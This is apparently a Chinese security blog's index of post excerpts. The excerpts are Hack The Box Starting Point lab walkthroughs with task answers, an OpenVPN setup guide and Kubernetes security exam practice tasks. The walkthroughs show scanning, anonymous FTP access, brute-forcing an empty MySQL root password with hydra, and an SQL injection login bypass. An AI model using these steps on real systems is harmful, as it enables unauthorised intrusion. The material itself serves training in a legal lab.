Hao DevSecOps

端口扫描nmap 10.129.171.69nmap 10.129.171.69 -A -p 21,80 允许匿名用户登录， 并且存在两个文件ftp 10.129.171.69 Anonymous #登录 ls #列出目录 get allowed.userlist get allowed.userlist.passwd exitcat allowed.userlistcat allowed.userlist.passwd 浏览80端口 爆破路径gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php 用上面文件的信息登录下,获得flag Task 1 What Nmap scanning switch employs the use of default scripts during a scan? -sC Task 2 What service version...

扫描， 发现3306端口开放nmap -A 10.129.95.232 弱密码，密码为空，如果破解其他密码可以把 -e nsr 换成字典路径即可ydra -l root -e nsr mysql://10.129.95.232 登录mysqlmysql -uroot -h 10.129.95.232 show databases; #列数据库 use htb; #切换数据库 show tables; # 列表 select * from config; #获取表中数据 Task 1 During our scan, which port do we find serving MySQL? 3306 Task 2 What community-developed MySQL version is the target running? MariaDB Task 3 When using the MySQL command line client,...

端口扫描nmap -sV 10.129.24.207 页面为登录页面，根据提示为SQL注入，尝试用 ‘ or 1=1;# 测试admin1' or 1=1;# Task 1 What does the acronym SQL stand for? Structured Query Language Task 2 What is one of the most common type of SQL vulnerabilities? sql injection Task 3 What does PII stand for? personally identifiable information Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection Task 5 What does Nmap report as the service and version that are running on...

Which TCP port is open on the machine? 6379 扫描 map -p- --min-rate 5000 -sV 10.129.241.156 --open Which service is running on the port that is open on the machine? redis What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database In-memory Database Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments. redis-cli Which flag is used...

扫描nmap --open 10.129.1.125 查看smb服务smbclient -L 10.129.1.125#smbclient \\\\IP\\共享目录smbclient \\\\10.129.1.125\\WorkShares ls #dir也是可以的 TASK 1 What does the 3-letter acronym SMB stand for? server message block TASK 2 What port does SMB use to operate at? 445 TASK 3 What is the service name for port 445 that came up in our Nmap scan? microsoft-ds TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share? -L TASK 5 How many shares...

扫描nmap --open 10.129.26.35nmap -A -p 21 10.129.26.35 获取flagftp 10.129.26.35 anonymous ls get flag.txt cat flag.txt TASK 1 What does the 3-letter acronym FTP stand for? File Transfer Protocol TASK 2 Which port does the FTP service listen on usually? 21 TASK 3 What acronym is used for the secure version of FTP? SFTP TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target? ping TASK 5 From your scans, what version is FTP...

一些名词,比较简单 TASK 1 What does the acronym VM stand for? Virtual Machine TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell. terminal TASK 3 What service do we use to form our VPN connection into HTB labs? openvpn Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output? tun Task 5 What tool do...

登陆后, 点击右侧的 Lab --> STARTING POINT 点击第一个 使用openvpn配置文件进行连接 下载配置文件 使用配置文件下载openvpn 客户端 https://openvpn.net/ Linux参考 : https://community.openvpn.net/openvpn/wiki/OpenVPN3Linux 使用: openvpn xxx.ovpn Windowshttps://openvpn.net/downloads/openvpn-connect-v3-windows.msi 使用: 安装以后导入下载的配置文件,然后点击连接 开启靶场虚拟机 左上角点击 Start point 可以查看当前连接情况, 当连接以后,就可以开启靶场了 点击 spawn machine 开机 稍等片刻出现IP地址就可以了进行测试了, 后面分别时重启和关机

Use context: kubectl config use-context workload-stage A security scan result shows that there is an unknown miner process running on one of the Nodes in cluster3. The report states that the process is listening on port 6666. Kill the process and delete the binary. 译文使用上下文: kubectl config use-context workload-stage 安全扫描结果显示，集群3中的一个节点上有一个未知的挖矿进程在运行。报告指出，该进程正在监听6666端口。杀死该进程并删除二进制文件。 解答检查node k get node 检查master节点 ssh cluster3-controlplane1netstat -plnt | grep 6666 检查 node节点 ssh...

Use context: kubectl config use-context infra-prod There is an existing Open Policy Agent + Gatekeeper policy to enforce that all Namespaces need to have label security-level set. Extend the policy constraint and template so that all Namespaces also need to set label management-team . Any new Namespace creation without these two labels should be prevented. Write the names of all existing Namespaces which violate the updated policy into /opt/course/p2/fix-namespaces . 译文使用上下文: kubectl...